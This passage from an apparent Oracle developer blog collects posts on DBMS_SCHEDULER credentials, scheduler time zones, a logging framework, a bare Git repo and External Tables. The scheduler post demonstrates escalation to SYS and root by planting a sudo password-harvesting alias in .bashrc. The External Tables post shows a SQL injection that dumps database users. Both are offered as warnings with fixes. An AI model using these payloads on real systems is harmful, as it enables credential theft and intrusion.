            sys_context('userenv', 'db_name') as db_name
        from dual;]';

    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential'
    );
    
    -- now run the job
    dbms_scheduler.enable(v_job_name);
end;
/

This time, we’ve hard-coded a connect string rather than using the database user credential. The result is a bit worrying…

OUTPUT                                                                                                                            
------------------------------------------------------------------------------

SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 19:15:43 2024
Version 19.3.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

SQL> SQL> Connected.
SQL> SQL> SQL> SQL>   2    3    4    5  
OS_USER 	     DB_USER		  DB_NAME   
-------------------- -------------------- --------------------
oracle		     SYS		  orclcdb    

SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0

Because the OS connection is as oracle, we can use the “/ as sysdba” connect string to connect as SYS.
It’s also worth bearing in mind that the credential can be used for jobs other than SQL_SCRIPT…

declare
    v_job_name varchar2(30) := 'HR_EXTERNAL';
    v_script varchar2(32767);
    
begin
    v_script := 'whoami';
        
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'EXTERNAL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential',
        enabled => TRUE
    );
end;
/

select output
from user_scheduler_job_run_details
where job_name = 'HR_EXTERNAL'
/

OUTPUT                        
------------------------------
oracle

On this Oracle Linux server, oracle is on the sudoers list, which means HR can do something like this…

set define off
declare
    v_job_name varchar2(30) := 'MWAHAHAHA';
    v_script varchar2(32767);
    
begin
    v_script := q'[/usr/bin/echo "alias sudo='echo -n \"[sudo] password for \$USER: \" && read -s -r password && echo -e \"\\n\" && echo \"\$USER:\$password\" >>/u01/userhome/oracle/stohelit.txt; echo \$password | $(which sudo) -S \$@'" >> /u01/userhome/oracle/.bashrc]';
        
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'EXTERNAL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential',
        enabled => TRUE
    );
end;
/

…which adds an alias for sudo to the oracle users .bashrc…

cat .bashrc
alias sudo='echo -n "[sudo] password for $USER: " && read -s -r password && echo -e "\n" && echo "$USER:$password" >>/u01/userhome/oracle/stohelit.txt; echo $password | /usr/bin/sudo -S $@'

This executes the next time anyone runs a sudo command whilst connected as oracle…

[oracle@localhost oracle]$ sudo ls -l
[sudo] password for oracle: 

Meaning that the oracle OS password is saved into a file called stohelit.txt and can be retrieved by running something like :

declare
    v_job_name varchar2(30) := 'UNLIMITED_POWER';
    v_script varchar2(32767);
    
begin
    v_script := 'ho /usr/bin/cat /u01/userhome/oracle/stohelit.txt';
        
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential',
        enabled => TRUE
    );
end;
/
select output
from user_scheduler_job_run_details
where job_name = 'UNLIMITED_POWER'
/

With the password, it’s now possible to run commands as root ( using sudo).

Clearly, a rethink is required…

revoke execute on oracle_os_credential from hr;
Creating an OS user for SQL_SCRIPT jobs

What we need is an OS user who isn’t oracle. But what else do we need to do to make an account suitable for running SQL_SCRIPT jobs as ?
It turns out, that the minimum requirement is simply a password.
If the application already has an OS user associated with it, then you can use that.
If not then we need to create one.

Remember, in my case, I’m on Oracle Linux so it’s just a matter of…

sudo useradd -m hr_etl
sudo passwd hr_etl

…and that’s it.

The new account doesn’t even need to have the SQL*Plus executable in it’s $PATH

[hr_etl@localhost ~]$ sqlplus /nolog
bash: sqlplus: command not found...

To demonstrate, we’ll connect to the database as the user with the CREATE CREDENTIAL privilege and …

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_ETL_OS_CREDENTIAL',
        username => 'hr_etl',
        password => 'Y3tanothercompl!catedpassword'
    );
end;
/

grant execute on hr_etl_os_credential to hr;

Now connected to the database as HR we use the new credential.

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB3';
    v_script varchar2(32767);

begin
    -- SQL*Plus statements included, but no connect string
    v_script := q'[
        column os_user format a20
        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
            sys_context('userenv', 'db_name') as db_name
        from dual;]';
        
    -- Using the new credential...
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.hr_etl_os_credential'
    );
    
    dbms_scheduler.set_attribute
    ( 
        name => v_job_name, 
        attribute => 'connect_credential_name',
        value => 'mike.hr_db_credential'
    );
    
    dbms_scheduler.enable(v_job_name);
end;
/

Better still, if we now try to login as SYS using the “/ as sysdba” syntax…

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB4';
    v_script varchar2(32767);
begin
    v_script := q'[
        conn / as sysdba
        column os_user format a20
        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
            sys_context('userenv', 'db_name') as db_name
        from dual;]';

    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.hr_etl_os_credential'
    );
    
    dbms_scheduler.enable(v_job_name);
end;
/

…Oracle is having none of it…

select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB4'
/

SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 20:09:43 2024
Version 19.3.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

SQL> SQL> ERROR:
ORA-01017: invalid username/password; logon denied


SQL> SQL> SQL> SQL>   2    3    4    5  SP2-0640: Not connected
SQL> 

In an application such as this, you’ll probably want to use SQL_SCRIPT to read and write files on the operating system, in which case further configuration will be needed in terms of OS file permissions etc. As far as running the jobs is concerned though, you should be good to go.

Acknowledgements

The sudo credential exploit above is based on a rather more elegant example in the SUDO_KILLER GitHub Repo.

Oracle DBMS_SCHEDULER – Getting in a tangle with Time Zones

Mon, 2024-10-28 02:30

DBMS_SCHEDULER’s slightly arcane but extremely flexible calendaring syntax allows myriad ways to determine when a batch job should run .
However, there is a limitation when it comes to specifying which time zone should be used by the scheduler.
The documentation says :

The calendaring syntax does not allow you to specify a time zone. Instead the Scheduler retrieves the time zone from the start_date argument. If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date. For example specifying the start_date time zone as ‘US/Eastern’ in New York ensures that daylight saving adjustments are automatically applied. If instead, the time zone of the start_date is set to an absolute offset, such as ‘-5:00’, then daylight savings adjustments are not followed and your job execution is off by an hour for half the year.

It goes on to explain that, when the start_date is null, the time zone is determined by ( in descending order of precedence) :

  • the time zone set in the current session (if it’s a Region Name)
  • the DEFAULT_TIMEZONE scheduler attribute
  • the time zone of the SYSTIMESTAMP when the Job (or Window) is enabled

Unfortunately, when setting a start_time for a job from inside another scheduler job, things do not work as expected.
If we were on a new-fangled AI enabled version of Oracle, I’d suspect that DIANA has taken a dislike to me ( maybe it doesn’t like the way I format my code, or something).
However, as I’ve experienced this behaviour on the less judgemental 19c ( and earlier), further digging is probably required…

How it Should Work

Let’s begin by confirming that everything works as it should when we setup a job interactively.

To start with, we’ll create a simple scheduler job :

begin
    dbms_scheduler.create_job
    (
        job_name => 'SIMPLE_JOB',
        job_type => 'PLSQL_BLOCK',
        job_action => 'begin null; end;'
    );    
end;
/

We can see at this point that the job has no start_date :

select enabled, state, start_date,
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

ENABL STATE     START_DATE 
----- --------- -----------
FALSE DISABLED                                                                                    

Let’s check what the current session time zone is set to :

select sessiontimezone from dual;

SESSIONTIMEZONE               
------------------------------
Europe/London

So, if we now set the job start_date…

exec dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-10-22 08:00', 'YYYY-MM-DD HH24:MI'));
exec dbms_scheduler.enable('simple_job');

… the scheduler should use the Session Time Zone :

select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE      START_DATE                                 
----- ---------- ------------------------------------------
TRUE  SCHEDULED  22-OCT-24 08.00.00.000000000 EUROPE/LONDON 

No issues there, let’s see what happens when we…

Set the Start Date from another Scheduler Job

Let’s start with a clean slate and drop and re-create the job :

exec dbms_scheduler.drop_job('simple_job');

begin
dbms_scheduler.create_job
(
    job_name => 'SIMPLE_JOB',
    job_type => 'PLSQL_BLOCK',
    job_action => 'begin null; end;'
);    
end;
/

This time, we’re going set the start_date for SIMPLE_JOB from another scheduler job :

declare
    v_action varchar2(4000) := 
    q'[
        begin
            dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI'));
            dbms_scheduler.enable('simple_job');   
        end;]';    
begin
    dbms_scheduler.create_job
    (
        job_name => 'enable_job',
        job_type => 'plsql_block',
        job_action => v_action
    );
end;
/

Now when we run ENABLE_JOB…

exec dbms_scheduler.run_job('enable_job');

…we can see that the scheduler has ignored the time zone altogether and instead applied an offset to UTC :

select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

ENABL STATE                START_DATE                          
----- -------------------- ----------------------------------- 
TRUE  SCHEDULED            22-NOV-24 08.00.00.000000000 +01:00 

Furthermore, the offset specified in the START_DATE value does not match the offset for the Europe/London region for that date:

select extract( timezone_hour from timestamp '2024-11-22 08:00:00.00 Europe/London') 
as offset_to_utc
from dual;

OFFSET_TO_UTC
-------------
0

Consequently the job will start an hour later than specified.

The Fix

If you were paying attention, you’ll know that the fix is RTFM !

Yes, that quote from the documentation above is explicit :

If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date.

In other words…

exec dbms_scheduler.drop_job('enable_job');

declare
    v_action varchar2(4000) := 
    q'[
        begin
            dbms_scheduler.set_attribute
            (
                name => 'simple_job', 
                attribute => 'start_date', 
                value => to_timestamp_tz('2024-11-22 08:00 Europe/London', 'YYYY-MM-DD HH24:MI TZR')
            );
            dbms_scheduler.enable('simple_job');   
        end;]';    
begin
    dbms_scheduler.create_job
    (
        job_name => 'enable_job',
        job_type => 'plsql_block',
        job_action => v_action
    );
end;
/

Now, when we run the start_date set job…

exec dbms_scheduler.run_job('enable_job');

…the Region we’ve specified is used …

select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

ENABL STATE                START_DATE                                 
----- -------------------- ------------------------------------------ 
TRUE  SCHEDULED            22-NOV-24 08.00.00.000000000 EUROPE/LONDON 
Why does this happen ?

For the moment, I’m going to assume that this is not caused by my reluctance to use commas at the start of the line in a select clause.

I’ve knocked up a procedure which will record the values of the relevant objects and save them to a log table. For this purpose, I’m using the Skippy framework, which will write to the SKIPPY_LOGS table.

NOTE – you will need to have SELECT on DBA_SCHEDULER_GLOBAL_ATTRIBUTE granted directly to the procedure owner for this to compile :

create or replace procedure log_tz_settings
as
    cursor c_tz_settings is
        select 
            sessiontimezone as session_tz,
            value as default_timezone,
            to_char(to_timestamp_tz( systimestamp), 'TZR') as systimestamp_tz
        from dba_scheduler_global_attribute
        where attribute_name = 'DEFAULT_TIMEZONE';
        
    v_settings c_tz_settings%rowtype;
    v_set_list varchar2(4000);
begin
    open c_tz_settings;
    fetch c_tz_settings into v_settings;
    close c_tz_settings;
    
    skippy.add_param('SESSION_TZ', v_settings.session_tz, v_set_list);
    skippy.add_param('DEFAULT_TIMEZONE', v_settings.default_timezone, v_set_list);
    skippy.add_param('SYSTIMESTAMP_TZ', v_settings.systimestamp_tz, v_set_list);
    
    skippy.log(v_set_list);
end;
/

When we execute this procedure in an interactive session, we can see that the values are as expected :

clear screen
set serverout on
exec skippy.enable_output;
exec log_tz_settings;

PL/SQL procedure successfully completed.

SESSION_TZ => Europe/London, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00

However, if we now add a call to this procedure in the ENABLE_JOB :

exec dbms_scheduler.drop_job('enable_job');

declare
    v_action varchar2(4000) := 
    q'[
        begin
            skippy.set_msg_group('CHECK_TZ_SETTINGS');
            log_tz_settings;
            dbms_scheduler.set_attribute
            (
                name => 'simple_job', 
                attribute => 'start_date', 
                value => to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI')
            );
            dbms_scheduler.enable('simple_job');   
        end;]';    
begin
    dbms_scheduler.create_job
    (
        job_name => 'enable_job',
        job_type => 'plsql_block',
        job_action => v_action
    );
end;
/

…and run it again…

exec dbms_scheduler.run_job('enable_job');
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

NABL STATE                START_DATE                          
----- -------------------- -----------------------------------
TRUE  SCHEDULED            22-NOV-24 08.00.00.000000000 +01:00

When we check the log, we can see that the SESSIONTIMEZONE value is not what we expected :

select message
from skippy_logs
where message_group = 'CHECK_TZ_SETTINGS'
/

MESSAGE                                                                                                                           
---------------------------------------------------------------
SESSION_TZ => +01:00, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00

Incidentally, the Scheduler Default Timezone (PST8DT) currently has an offset of -7 hours to UTC.

Therefore, we can infer that the SESSIONTIMEZONE value is being used even though it’s an absolute offset rather than a region name in the session that the Scheduler Job is running in.

Assorted Time Zone Information

Oracle provides a list of valid Region Names in the form of V$TIMEZONE_NAMES. For example …

select tzname, tzabbrev
from v$timezone_names
where tzname = 'UTC'
/

TZNAME                                             TZABBREV  
-------------------------------------------------- ----------
UTC                                                GMT       

If we look at the currently defined Region in my session, we can see multiple TZABBREV values that appear to represent daylight savings changes …

select tzname, tzabbrev
from v$timezone_names
where tzname = sessiontimezone
/

TZNAME                                             TZABBREV  
-------------------------------------------------- ----------
Europe/London                                      LMT       
Europe/London                                      GMT       
Europe/London                                      BST       
Europe/London                                      BDST      

Using the built-in TZ_OFFSET function, we can establish the current UTC offset for a Region…

select tz_offset('Europe/London')  from dual;

TZ_OFFS
-------
+01:00

To see which particular abbreviation this offset relates to :

select to_char(current_timestamp, 'TZD') from dual;

TO_CHA
------
BST

If we want to know which particular Timezone abbreviation will apply for any given month in the year, and when they will change, we may need to write something a bit fiddly like :

select 
    to_char( to_date( rownum, 'MM'), 'Month') as "Month",
    -- Using 10:08 as the time because that's what you see in all the watch/clock adverts. Phones too.
    -- This time was apparently chosen because, on an Analog clockface the hands are forming a "smile".
    to_char
    ( 
        to_timestamp_tz 
        (
            extract( year from sysdate)||'-'||
            to_char( lpad( rownum, 2, '0'))||'-'||
            '01 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
        ),
        'TZD'
    ) as "Start of Month TZ Abbreviation",
    to_char
    ( 
        to_timestamp_tz 
        (
            extract( year from sysdate)||'-'||
            to_char( lpad( rownum, 2, '0'))||'-'||
            to_char( last_day( to_date( rownum, 'MM')), 'DD')||
            ' 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
        ),
        'TZD'
    ) as "End of Month TZ Abbreviation"
from dual
connect by rownum <= 12;

What’s that ? You think DIANA may have a point about my code formatting ? Honestly, everyone’s a critic ! Anyhow, the output looks like this :

Other Useful Link

I bet Tim Hall never has this trouble. Also, his Oracle Base article on setting Time Zones is typically thorough.

Skippy – Displaying log messages using DBMS_OUTPUT

Mon, 2024-10-21 01:30

I’ve added a feature to the Skippy framework which makes it possible to see log messages in an interactive session, as well as in the log table.
You can find Skippy on GitHub.

Now, Skippy isn’t really into cricket – Rugby League is more of a Kangaroo sport – but I am, which may go some way to explaining the examples that follow.

The England’s continuing Bazball adventure has met with contrasting fortunes over the last week or so.
In this first example, we can see the sort of logging that you might find in long-running scheduler batch jobs :

begin
    skippy.set_msg_group('FIRST_TEST');
    skippy.log('Day 1 : Pakistan 328/4');
    skippy.log('Day 2 : Pakistan 556 all out, England 96/1');
    skippy.log('Day 3 : England 492/3');
    skippy.log('Day 4 : England 823/7 dec, Pakistan 152/6');
    skippy.log('Day 5 : Pakistan 220 all out');
    skippy.log('Result : England win by an innings and 47 runs');
end;
/

After running this, we have to hunt around in the SKIPPY_LOG table to find the log messages :

select log_ts, message
from skippy_logs
where message_group = 'FIRST_TEST'
order by log_ts;

If we want to execute code in an interactive session, we can now read the log messages in the session itself.
To do this :

  • enable SERVEROUTPUT in your interactive session so you can see the messages
  • call the new SKIPPY.ENABLE_OUTPUT procedure.
  • call SKIPPY.DISABLE_OUTPUT to toggle this feature off.

For example…

set serverout on
begin
    skippy.set_msg_group('SECOND_TEST');
    skippy.enable_output;
    skippy.log('Day 1 : Pakistan 259/5');
    skippy.log('Day 2 : Pakistan 366, England 239/6');
    skippy.log('Day 3 : England 291, Pakistan 221, England 36/2');
    skippy.log('Day 4 : ERROR - England batting failed 144 all out');
    skippy.log('Result : Pakistan win by 152 runs');
    -- optionally turn output off
    skippy.disable_output;
end;
/

As well as outputting to the screen, SKIPPY still writes the log messages to the table.

What’s that Skippy ? SYS_CONTEXT USERENV Parameters in the database don’t match the docs ?

Mon, 2024-07-15 01:30

The USERENV namespace lurks in one of the darker corners of your Oracle Databse.
In conjunction with the SYS_CONTEXT function, it’s incredibly useful if you want to know what’s happening in your session environment at any given time.
However, the parameters defined for this namespace are locked away beyond the reach of mere mortals, which means you have to rely on the documentation to know which parameters are valid on which version of Oracle.
You might think that’s not really a problem, after all, Oracle Documentation is pretty reliable, right ?
Yes…mostly…

Having grown lazy over the year and decided that I wanted to do as little typing as possible when logging from my PL/SQL code, I wrote a simple framework called Skippy, which is on GitHub, if you’re interested.

One element of Skippy is a simple table which holds a list of all the available parameters for the USERENV namespace and the version from which they are valid. There is also a view – SKIPPY_ENV, which overlays the table and returns values for the parameters which are valid for the Oracle version it’s currently running.

Originally, the parameters listed in the table were gleaned from the Oracle documentation. The most recent examples of which are :

Unfortunately, there are a couple of discrepancies between the documentation and the database.

According to the 19c documentation, CDB_DOMAIN is a valid parameter on 19c, whilst CLOUD_SERVICE is not mentioned.
Meanwhile, IS_APPLICATION_ROOT and IS_APPLICATION_PDB are absent from the 23ai docs, despite them having been around since 19c.

The reality on 19c is that CDB_DOMAIN is not valid, but CLOUD_SERVICE is (tested on an OCI Free Tier instance) :

select product, version_full
from product_component_version;

PRODUCT                                            VERSION_FULL        
-------------------------------------------------- --------------------
Oracle Database 19c Enterprise Edition             19.24.0.1.0         
select sys_context('userenv', 'cdb_domain') as cdb_domain from dual; 

…results in…

ORA-02003: invalid USERENV parameter

By contrast…

select sys_context('userenv', 'cloud_service') as cloud_service from dual;

CLOUD_SERVICE       
--------------------
OLTP
select sys_context('userenv', 'is_application_root') as is_application_root from dual;

IS_APPLICATION_ROOT 
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;

IS_APPLICATION_PDB  
--------------------
NO

Meanwhile, it appears that IS_APPLICATION_ROOT and IS_APPLICATION_PDB are still valid on 23ai. This time, I’ve tested on a VirtualBox Dev Day Appliance :

select product, version_full
from product_component_version;

PRODUCT                                            VERSION_FULL        
-------------------------------------------------- --------------------
Oracle Database 23ai Free                          23.4.0.24.05        
select sys_context('userenv', 'is_application_root') as is_application_root from dual;

IS_APPLICATION_ROOT 
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;

IS_APPLICATION_PDB  
--------------------
NO

CDB_DOMAIN has also made an appearance in this version :

select sys_context('userenv', 'cdb_domain') as cdb_domain from dual; 

CDB_DOMAIN          
--------------------

CLOUD_SERVICE is still kicking around :

select sys_context('userenv', 'cloud_service') as cloud_service from dual;

CLOUD_SERVICE       
--------------------

I’ve submitted comments on the appropriate documentation pages but I can’t see any way to track the response or progress on these.

Fortunately, for me, my friendly neighbourhood marsupial has now got this covered, but it’s something you may want to keep an eye out for if you maintain you’re own list of Userenv Parameters.

Creating a central Repository using Git Bare

Mon, 2024-06-17 01:30

When working in a large IT department, there are times when you feel a bit like a Blue Peter presenter.
For example, there may be a requirement to colloborate with other programmers on a project but, for whatever reason, you do not have access to a hosting platform ( Github, Bitbucket, Gitlab – pick you’re favourite).

What you do have is a network share to which you all have access, and Git installed locally on each of your machines.

This can be thought of as the technical equivalent of an empty washing-up bottle, a couple of loo rolls and some sticky back plastic.
Fortunately, this represents the raw materials required to construct a Tracey Island or – in this case – a Bare Git Repo to act as the main repository for the project…

The Repository we want to share looks like this :

To create the main repository on the share, we can open a command window and create the directory to hold the repository on the share ( which is mapped to Z:\ in my case) :

mkdir z:\blue_peter


…then navigate to the new directory and create a Bare Repo …

git init --bare

You can then populate the repo with the existing project.

git remote add origin z:\blue_peter
git push origin main

NOTE – it could be because I was doing this on a VM, but when I first ran the push, I got an error about the ownership of the shared directory :

This can be solved by running :

git config --global --add safe.directory z:blue_peter

Looking at the files in our new main repo, we can see that it’s not shown as individual files, as you’d expect in a normal repo :

However, we can access the contents via Git in the normal way.
For example, I can now clone the repository to a different location. In real-life this would be a completely different client, but I’ve run out of VMs !

git clone z:\blue_peter

Side Note – Once again, I hit the dubious ownership issue :

Anyhow, we can see the files as usual in the cloned repo :

…and the repository now behaves as expected. If we make a change and push it…

We can pull the repo in another “client” :

After all that, I think you’ve earned a Blue Peter Badge.

Oracle External Tables and the External Modify Clause

Wed, 2024-06-05 13:51

I like to think that I’m not completely useless in the kitchen. A pinch of this, a dash of that and a glug of what you fancy ( which may or may not make it’s way into whatever I’m cooking) and the result is usually edible at least.
That said, the combination of precise quantities of substances by means of closely controlled chemical reactions is more Deb’s forte.
The result is usually delicious. Being traditionalists in our house, we do like to follow the time-honoured bake-off format and have a judging session of the finished article. We think of it as the Great British Cake Scoff.
However satisfying the act of culinary creation may be, there are times when you just want something you need to stick in the microwave for 2 minutes.
Which brings us to the matter of Oracle External Tables.

When they first arrived, External Tables provided an easy way to load data from a file directly into the database without all that messing about with SQL*Loader.
Of course, there were some limitations. If you wanted to point an external table at a file, you’d have to issue an alter table statement to set it ( and possibly the directory as well).
This meant that External Table access had to be serialized to ensure that it was pointed at the correct file until you were finished with it.
If you find yourself switching between Oracle versions, it’s worth remembering that, these days, things are a little different, thanks to the EXTERNAL MODIFY, which arrived in 12c.

What I’ll be looking at here is whether External tables can now be used concurrently in different sessions, accessing different files.

I’ll also explore the EXTERNAL MODIFY clause’s aversion to bind variables and how we might work around this securely in PL/SQL.

The Application

The examples that follow were run on an Oracle Developer Day Virtual Box instance running Oracle 19.3.

We have a directory…

create or replace directory recipies_dir as '/u01/app/recipies';

…which contains some text files…

ls -1
debs_lemon_drizzle_cake.txt
mikes_beans_on_toast.txt

…and a simple external table to read files…

create table nom_nom_xt 
(
    line number,
    text varchar2(4000)
)
organization external
(
    type oracle_loader
    default directory upload_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(4000)
        )
    ) 
    location('')
)
reject limit unlimited
/

You’ll notice that I’ve specified the default directory as this is mandatory. However the location (i.e. the target file) is currently null.
Now, in the olden days, we’d have to issue a DDL statement to set the location before we could look at a file.
Since 12c however, we have the EXTERNAL MODIFY clause, so we can do this directly in a query :

select text   
from nom_nom_xt 
    external modify 
    ( 
        default directory recipies_dir 
        location('mikes_beans_on_toast.txt')
    )
/


Alternatively…

select text
from nom_nom_xt 
    external modify
    ( 
        location(recipies_dir:'debs_lemon_drizzle_cake.txt')
    )
/

After running these statments, we can see that the EXTERNAL MODIFY clause has had no effect on the table definition itself :

select directory_name, location
from user_external_locations
where table_name = 'NOM_NOM_XT';

Concurrency

Looking at the EXTERNAL MODIFY clause, it would seem that External Tables should now behave like Global Temporary Tables in that, whilst their structure is permanent, the data they contain is session specific.

Let’s put that to the test.
First of all, I’m going to take advantage of the fact I’m on Linux ( Oracle Linux Server 7.6 since you ask) and generate a text file from /usr/share/dict/words – a file that contains a list of words.

In the recipies directory on the os :

for i in {1..100}; do cat /usr/share/dict/words >>alphabet_soup.txt; done
cat alphabet_soup.txt >alphabetty_spaghetti.txt

I now have two rather chunky text files :

ls -lh alphabet*
-rw-r--r--. 1 oracle oinstall 473M May 27 14:25 alphabet_soup.txt
-rw-r--r--. 1 oracle oinstall 473M May 27 14:26 alphabetty_spaghetti.txt

…containing just under 48 million lines each…

cat alphabet_soup.txt |wc -l
47982800

Using the single external table, I’m going to load each file into a separate table in separate sessions.

The script for session 1 is :

set worksheetname Soup
column start_time format a10
column end_time format a10

-- Check that this is a different session from "session 2"
select sys_context('userenv', 'sessionid') from dual;

-- Give me time to switch sessions and start the other script
exec dbms_session.sleep(2);

select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;

set timing on
create table alphabet_soup as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabet_soup.txt'));

set timing off

select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;

select count(*) from alphabet_soup;

In session 2 :

set worksheetname Spaghetti
column start_time format a10
column end_time format a10

-- Check that this is a different session from "session 1"
select sys_context('userenv', 'sessionid') from dual;

select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;

set timing on
create table alphabetty_spaghetti as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabetty_spaghetti.txt'));

set timing off
select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;

select count(*) from alphabetty_spaghetti;

Note – the set worksheetname command is SQLDeveloper specific.

The results are…

Session 1 (Soup)
SYS_CONTEXT('USERENV','SESSIONID')                                                                                                                                                                                                                              
------------------------------------
490941


PL/SQL procedure successfully completed.


START_TIME
----------
14:45:08


Table ALPHABET_SOUP created.

Elapsed: 00:01:06.199

END_TIME
----------
14:46:15


COUNT(*)
----------
47982800

Session 2 (Spaghetti)
SYS_CONTEXT('USERENV','SESSIONID')                                                                                                                                                                                                                              
-----------------------------------
490942


START_TIME
----------
14:45:09


Table ALPHABETTY_SPAGHETTI created.

Elapsed: 00:01:08.043

END_TIME
----------
14:46:17


COUNT(*)
----------
47982800

As we can see, the elapsed time is almost identical in both sessions. More importantly, both sessions’ CTAS statements finished within a couple of seconds of each other.
Therefore, we can conclude that both sessions accessed the External Table in parallel.

Whilst this does represent a considerable advance in the utility of External Tables, there is something of a catch when it comes to using them to access files via SQL*Plus…

Persuading EXTERNAL MODIFY to eat it’s greens

A common use case for External Tables tends to be ETL processing. In such circumstances, the name of the file being loaded is likely to change frequently and so needs to be specified at runtime.
It’s also not unusual to have an External Table that you want to use on more than one directory ( e.g. as a log file viewer).
On the face of it, the EXTERNAL MODIFY clause should present no barrier to use in PL/SQL :

clear screen
set serverout on 
begin
    for r_line in 
    (
        select text
        from nom_nom_xt external modify ( default directory recipies_dir location ('debs_lemon_drizzle_cake.txt') )
    )
    loop
        dbms_output.put_line(r_line.text);
    end loop;
end;
/

Whilst this works with no problems, look what happens when we try to use a variable to specify the filename :

clear screen
set serverout on 
declare
    v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
begin
    for r_line in 
    (
        select text
        from nom_nom_xt 
            external modify 
            ( 
                default directory recipies_dir 
                location (v_file) 
            )
    )
    loop
        dbms_output.put_line(r_line.text);
    end loop;
end;
/
ORA-06550: line 7, column 90: 
PL/SQL: ORA-00905: missing keyword

Specifying the directory in a variable doesn’t work either :

declare
    v_dir varchar2(4000) := 'recipies_dir';
begin
    for r_line in 
    (
        select text
        from nom_nom_xt 
            external modify 
            ( 
                default directory v_dir 
                location ('debs_lemon_drizzle_cake.txt') 
            )
    )
    loop
        dbms_output.put_line(r_line.text);
    end loop;
end;
/

ORA-06564: object V_DIR does not exist

Just in case you’re tempted to solve this by doing something simple like :

clear screen
set serverout on 
declare
    v_dir all_directories.directory_name%type := 'recipies_dir';
    v_file varchar2(100) := 'mikes_beans_on_toast.txt';
    v_stmnt clob := 
        q'[
            select text
            from nom_nom_xt external modify( default directory <dir> location('<file>'))
        ]';
    v_rc sys_refcursor;
    v_text varchar2(4000);
begin
    v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
    open v_rc for v_stmnt;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line(v_text);
    end loop;
    close v_rc;
end;
/

You should be aware that this approach is vulnerable to SQL Injection.
I know that it’s become fashionable in recent years for “Security” to be invoked as a reason for all kinds of – often questionable – restrictions on the hard-pressed Software Engineer.
So, just in case you’re sceptical about this, here’s a quick demo :

clear screen
set serverout on 
declare
    v_dir varchar2(500) := 
        q'[recipies_dir location ('mikes_beans_on_toast.txt')) union all select username||' '||account_status||' '||authentication_type from dba_users --]';
    v_file varchar2(100) := 'mikes_beans_on_toast.txt';
    v_stmnt varchar2(4000) := q'[select text from nom_nom_xt external modify (default directory <dir> location ('<file>'))]';
    v_rc sys_refcursor;
    v_text varchar2(4000);
begin
    v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
    open v_rc for v_stmnt;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line(v_text);
    end loop;
    close v_rc;
end;
/

bread
baked beans
butter
SYS OPEN PASSWORD
SYSTEM OPEN PASSWORD
XS$NULL EXPIRED & LOCKED PASSWORD
HR OPEN PASSWORD

...snip...

PL/SQL procedure successfully completed.

If we resort to Dynamic SQL, we can pass the filename into the query as a bind variable :

set serverout on
declare
    v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
    v_stmnt clob := 
        'select text from nom_nom_xt external modify( default directory recipies_dir location (:v_file))';
    v_rc sys_refcursor;
    v_text varchar2(4000);
    v_rtn number;
begin
    open v_rc for v_stmnt using v_file;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line( v_text);
        
    end loop;
    close v_rc;
end;
/

…or, if you prefer…

clear screen
set serverout on
declare
